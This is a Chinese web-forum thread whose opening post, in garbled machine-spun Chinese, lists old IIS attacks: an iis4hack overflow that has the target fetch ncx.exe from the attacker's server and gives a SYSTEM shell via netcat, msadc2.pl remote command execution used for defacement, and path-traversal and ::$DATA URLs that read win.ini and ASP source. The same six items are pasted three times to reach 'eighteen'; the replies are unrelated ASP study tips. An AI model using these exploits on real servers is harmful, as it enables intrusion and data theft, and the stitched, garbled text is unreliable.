仓酷云

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 598|回复: 8
打印 上一主题 下一主题

[学习教程] ASP网站制作之IIS中罕见的十八个平安毛病

[复制链接]
简单生活 该用户已被删除
跳转到指定楼层
楼主
发表于 2015-1-16 22:15:05 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
楼上说交互性不好,太牵强了吧。在微软提供的一套框架中,利用asp做网站,开发效率高,使用人数少,减少不必要的开销。交互性是互动方式,是有开发人员决定的。iis|平安|平安毛病  1.iis4hack缓冲溢出
  次要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL哀求没有对名字举行充实的界限反省,招致运转打击者拔出一些后门程序在体系中下载和实行程序。要检测如许的站点你必要两个文件iishack.exe,ncx.exe,你能够到上面的站点www.technotronic.com往下载,别的你还必要一台本人的WEB服务器。你如今你本人的WEB服务器上运转WEB服务程序并把ncx.exe放到你本人响应的目次下,然后利用iishack.exe来反省方针呆板:
  c:>iishack.exe80/ncx.exe
  然后你就利用netcat来毗连你要检测的服务器:
  c:>nc80
  假如溢出点准确你就能够看到方针呆板的命令行提醒,而且是办理远权限。使用程序见iis4hack.zip
  2.msadc
  IIS的MDAC组件存在一个毛病能够招致打击者远程实行你体系的命令。次要中心成绩是存在于RDSDatafactory,默许情形下,它同意远程命令发送到IIS服务器中,这命令会以设备用户的身份运转,其一样平常默许情形下是SYSTEM用户。使用程序为msadc2.pl,我们看看它的help
  [quack@chatquack]$perlmsadc2.pl-h
  --RDSsmackv2-rainforestpuppy/ADM/wiretrip--
  Usage:msadc.pl-h{-d-X-v}
  -h=hostyouwanttoscan(ipordomain)
  -d=delaybetweencalls,default1second
  -X=dumpIndexServerpathtable,ifavailable
  -N=queryVbBusObjforNetBIOSname
  -V=useVbBusObjinsteadofActiveDataFactory
  -v=verbose
  -e=externaldictionaryfileforstep5
  -u<hostsharefile>=useUNCfile
  -w=Windows95insteadofWindowsNT
  -c=v1compatibility(threestepquery)
  -s=runonlystep
  Ora-Rwillresumea(v2)commandsession
  [quack@chatquack]$perlmsadc2.pl-hhttp://www.targe.com/
  --RDSsmackv2-rainforestpuppy/ADM/wiretrip--
  Typethecommandlineyouwanttorun(cmd/cassumed):
  cmd/c
  假如呈现cmd/c后,间接键进命令行,就能够以system权限实行命令了。好比xundi教的:
  echohackedbyme>d:inetpubwwwrootvictimwebindex.htm
  3.Codebrws.asp

  观察文件源代码
  http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp
  4.Showcode.asp
  观察文件源代码
  http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini
  5.Null.htw
  观察文件源代码
  http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full
  6.webhits.dll&.htw
  hit-highligting功效是由IndexServer供应的同意一个WEB用户在文档上highlighted(凸起)他们原始搜刮的条目,这个文档的名字经由过程变量CiWebhitsfile传送给.htw文件,Webhits.dll是一个ISAPI使用程序来处置哀求,翻开文件并前往了局,当用户把持了CiWebhitsfile参数传送给.htw时,他们就能够哀求恣意文件,了局就是招致检察ASP源码和其他剧本文件内容。要懂得你是不是存在这个毛病,你能够哀求以下条目:
  http://www.victim.com/nosuchfile.htw假如你从服务器端取得以下信息:
  formatoftheQUERY_STRINGisinvalid这就暗示你存在这个毛病.这个成绩次要就是webhits.dll联系关系了.htw文件的映照,以是你只需作废
  这个映照就可以制止这个毛病,你能够在你以为有毛病的体系中搜刮.htw文件,一样平常会发明以下的程序:
  /iissamples/issamples/oop/qfullhit.htw
  /iissamples/issamples/oop/qsumrhit.htw
  /isssamples/exair/search/qfullhit.htw
  /isssamples/exair/search/qsumrhit.htw
  /isshelp/iss/misc/iirturnh.htw(这个通常是loopback利用)
  一个打击者可使用以下的办法来会见体系中文件的内容:
  http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?
  ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full
  就会在有此毛病体系中win.ini文件的内容。7.ASPAlternateDataStreams(::$DATA)要检察一些.asp文件的内容,你能够哀求以下的URL:http://www.victim.com/default.asp::$DATA你就失掉了源代码
  7.iis4hack缓冲溢出

  次要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL哀求没有对名字举行充实的界限反省,招致运转打击者拔出一些后门程序在体系中下载和实行程序。要检测如许的站点你必要两个文件iishack.exe,ncx.exe,你能够到上面的站点www.technotronic.com往下载,别的你还必要一台本人的WEB服务器。你如今你本人的WEB服务器上运转WEB服务程序并把ncx.exe放到你本人响应的目次下,然后利用iishack.exe来反省方针呆板:
  c:>iishack.exe80/ncx.exe
  然后你就利用netcat来毗连你要检测的服务器:
  c:>nc80
  假如溢出点准确你就能够看到方针呆板的命令行提醒,而且是办理远权限。使用程序见iis4hack.zip
  8.msadc
  IIS的MDAC组件存在一个毛病能够招致打击者远程实行你体系的命令。次要中心成绩是存在于RDSDatafactory,默许情形下,它同意远程命令发送到IIS服务器中,这命令会以设备用户的身份运转,其一样平常默许情形下是SYSTEM用户。使用程序为msadc2.pl,我们看看它的help
  [quack@chatquack]$perlmsadc2.pl-h
  --RDSsmackv2-rainforestpuppy/ADM/wiretrip--
  Usage:msadc.pl-h{-d-X-v}
  -h=hostyouwanttoscan(ipordomain)
  -d=delaybetweencalls,default1second
  -X=dumpIndexServerpathtable,ifavailable
  -N=queryVbBusObjforNetBIOSname
  -V=useVbBusObjinsteadofActiveDataFactory
  -v=verbose
  -e=externaldictionaryfileforstep5
  -u<hostsharefile>=useUNCfile
  -w=Windows95insteadofWindowsNT
  -c=v1compatibility(threestepquery)
  -s=runonlystep
  Ora-Rwillresumea(v2)commandsession
  [quack@chatquack]$perlmsadc2.pl-hhttp://www.targe.com/
  --RDSsmackv2-rainforestpuppy/ADM/wiretrip--
  Typethecommandlineyouwanttorun(cmd/cassumed):
  cmd/c
  假如呈现cmd/c后,间接键进命令行,就能够以system权限实行命令了。好比xundi教的:
  echohackedbyme>d:inetpubwwwrootvictimwebindex.htm
  9.Codebrws.asp

  观察文件源代码
  http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp
  10.Showcode.asp
  观察文件源代码
  http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini
  11.Null.htw
  观察文件源代码
  http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full
  12.webhits.dll&.htw
  hit-highligting功效是由IndexServer供应的同意一个WEB用户在文档上highlighted(凸起)他们原始搜刮的条目,这个文档的名字经由过程变量CiWebhitsfile传送给.htw文件,Webhits.dll是一个ISAPI使用程序来处置哀求,翻开文件并前往了局,当用户把持了CiWebhitsfile参数传送给.htw时,他们就能够哀求恣意文件,了局就是招致检察ASP源码和其他剧本文件内容。要懂得你是不是存在这个毛病,你能够哀求以下条目:
  http://www.victim.com/nosuchfile.htw假如你从服务器端取得以下信息:
  formatoftheQUERY_STRINGisinvalid这就暗示你存在这个毛病.这个成绩次要就是webhits.dll联系关系了.htw文件的映照,以是你只需作废
  这个映照就可以制止这个毛病,你能够在你以为有毛病的体系中搜刮.htw文件,一样平常会发明以下的程序:
  /iissamples/issamples/oop/qfullhit.htw
  /iissamples/issamples/oop/qsumrhit.htw
  /isssamples/exair/search/qfullhit.htw
  /isssamples/exair/search/qsumrhit.htw
  /isshelp/iss/misc/iirturnh.htw(这个通常是loopback利用)
  一个打击者可使用以下的办法来会见体系中文件的内容:
  http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?
  ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full
  就会在有此毛病体系中win.ini文件的内容。7.ASPAlternateDataStreams(::$DATA)要检察一些.asp文件的内容,你能够哀求以下的URL:http://www.victim.com/default.asp::$DATA你就失掉了源代码
  13.iis4hack缓冲溢出

  次要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL哀求没有对名字举行充实的界限反省,招致运转打击者拔出一些后门程序在体系中下载和实行程序。要检测如许的站点你必要两个文件iishack.exe,ncx.exe,你能够到上面的站点www.technotronic.com往下载,别的你还必要一台本人的WEB服务器。你如今你本人的WEB服务器上运转WEB服务程序并把ncx.exe放到你本人响应的目次下,然后利用iishack.exe来反省方针呆板:
  c:>iishack.exe80/ncx.exe
  然后你就利用netcat来毗连你要检测的服务器:
  c:>nc80
  假如溢出点准确你就能够看到方针呆板的命令行提醒,而且是办理远权限。使用程序见iis4hack.zip
  14.msadc
  IIS的MDAC组件存在一个毛病能够招致打击者远程实行你体系的命令。次要中心成绩是存在于RDSDatafactory,默许情形下,它同意远程命令发送到IIS服务器中,这命令会以设备用户的身份运转,其一样平常默许情形下是SYSTEM用户。使用程序为msadc2.pl,我们看看它的help
  [quack@chatquack]$perlmsadc2.pl-h
  --RDSsmackv2-rainforestpuppy/ADM/wiretrip--
  Usage:msadc.pl-h{-d-X-v}
  -h=hostyouwanttoscan(ipordomain)
  -d=delaybetweencalls,default1second
  -X=dumpIndexServerpathtable,ifavailable
  -N=queryVbBusObjforNetBIOSname
  -V=useVbBusObjinsteadofActiveDataFactory
  -v=verbose
  -e=externaldictionaryfileforstep5
  -u<hostsharefile>=useUNCfile
  -w=Windows95insteadofWindowsNT
  -c=v1compatibility(threestepquery)
  -s=runonlystep
  Ora-Rwillresumea(v2)commandsession
  [quack@chatquack]$perlmsadc2.pl-hhttp://www.targe.com/
  --RDSsmackv2-rainforestpuppy/ADM/wiretrip--
  Typethecommandlineyouwanttorun(cmd/cassumed):
  cmd/c
  假如呈现cmd/c后,间接键进命令行,就能够以system权限实行命令了。好比xundi教的:
  echohackedbyme>d:inetpubwwwrootvictimwebindex.htm
  15.Codebrws.asp

  观察文件源代码
  http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp
  16.Showcode.asp
  观察文件源代码
  http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini
  17.Null.htw
  观察文件源代码
  http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full
  18.webhits.dll&.htw
  hit-highligting功效是由IndexServer供应的同意一个WEB用户在文档上highlighted(凸起)他们原始搜刮的条目,这个文档的名字经由过程变量CiWebhitsfile传送给.htw文件,Webhits.dll是一个ISAPI使用程序来处置哀求,翻开文件并前往了局,当用户把持了CiWebhitsfile参数传送给.htw时,他们就能够哀求恣意文件,了局就是招致检察ASP源码和其他剧本文件内容。要懂得你是不是存在这个毛病,你能够哀求以下条目:
  http://www.victim.com/nosuchfile.htw假如你从服务器端取得以下信息:
  formatoftheQUERY_STRINGisinvalid这就暗示你存在这个毛病.这个成绩次要就是webhits.dll联系关系了.htw文件的映照,以是你只需作废
  这个映照就可以制止这个毛病,你能够在你以为有毛病的体系中搜刮.htw文件,一样平常会发明以下的程序:
  /iissamples/issamples/oop/qfullhit.htw
  /iissamples/issamples/oop/qsumrhit.htw
  /isssamples/exair/search/qfullhit.htw
  /isssamples/exair/search/qsumrhit.htw
  /isshelp/iss/misc/iirturnh.htw(这个通常是loopback利用)
  一个打击者可使用以下的办法来会见体系中文件的内容:
  http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?
  ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full
  就会在有此毛病体系中win.ini文件的内容。7.ASPAlternateDataStreams(::$DATA)要检察一些.asp文件的内容,你能够哀求以下的URL:http://www.victim.com/default.asp::$DATA你就失掉了源代码
asp对于服务器的要求较高,一般的服务器如果访问量一大就垮了,不得不重启。
兰色精灵 该用户已被删除
沙发
发表于 2015-1-19 06:00:50 | 只看该作者
尽管MS自己讲C#内核中更多的象VC,但实际上我还是认为它和Java更象一些吧。首先它是面向对象的编程语言,而不是一种脚本,所以它具有面向对象编程语言的一切特性,比如封装性、继承性、多态性等等,这就解决了刚才谈到的ASP的那些弱点。
飘飘悠悠 该用户已被删除
板凳
发表于 2015-1-26 22:41:24 | 只看该作者
Response:从字面上讲是“响应”,因此这个是服务端向客户端发送东西的,例如Response.Write
透明 该用户已被删除
地板
发表于 2015-2-4 22:41:28 | 只看该作者
下面简单介绍一下我学习ASP的方法,希望对想学习ASP的朋友有所帮助...
莫相离 该用户已被删除
5#
发表于 2015-2-10 22:15:42 | 只看该作者
跟学别的语言一样,先掌握变量,流程控制语句(就是ifwhileselect)等,函数/过程,数组
不帅 该用户已被删除
6#
发表于 2015-3-1 16:52:10 | 只看该作者
跟学别的语言一样,先掌握变量,流程控制语句(就是ifwhileselect)等,函数/过程,数组
简单生活 该用户已被删除
7#
 楼主| 发表于 2015-3-10 21:19:42 | 只看该作者
从事这个行业,那么你可以学ASP语言,简单快速上手,熟练dreamweav排版,写asp代码,熟练photoshop处理图片,打好基础就行了
变相怪杰 该用户已被删除
8#
发表于 2015-3-17 10:52:34 | 只看该作者
先学习用frontpage熟悉html编辑然后学习asp和vbscript建议买书进行系统学习
柔情似水 该用户已被删除
9#
发表于 2015-3-24 07:52:09 | 只看该作者
不是很难但是英文要有一点基础网上的教程很少有系统的详细的去买书吧,另不用专门学习vb关于vbscript脚本在asp教材都有介绍
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|仓酷云 鄂ICP备14007578号-2

GMT+8, 2024-12-23 23:47

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表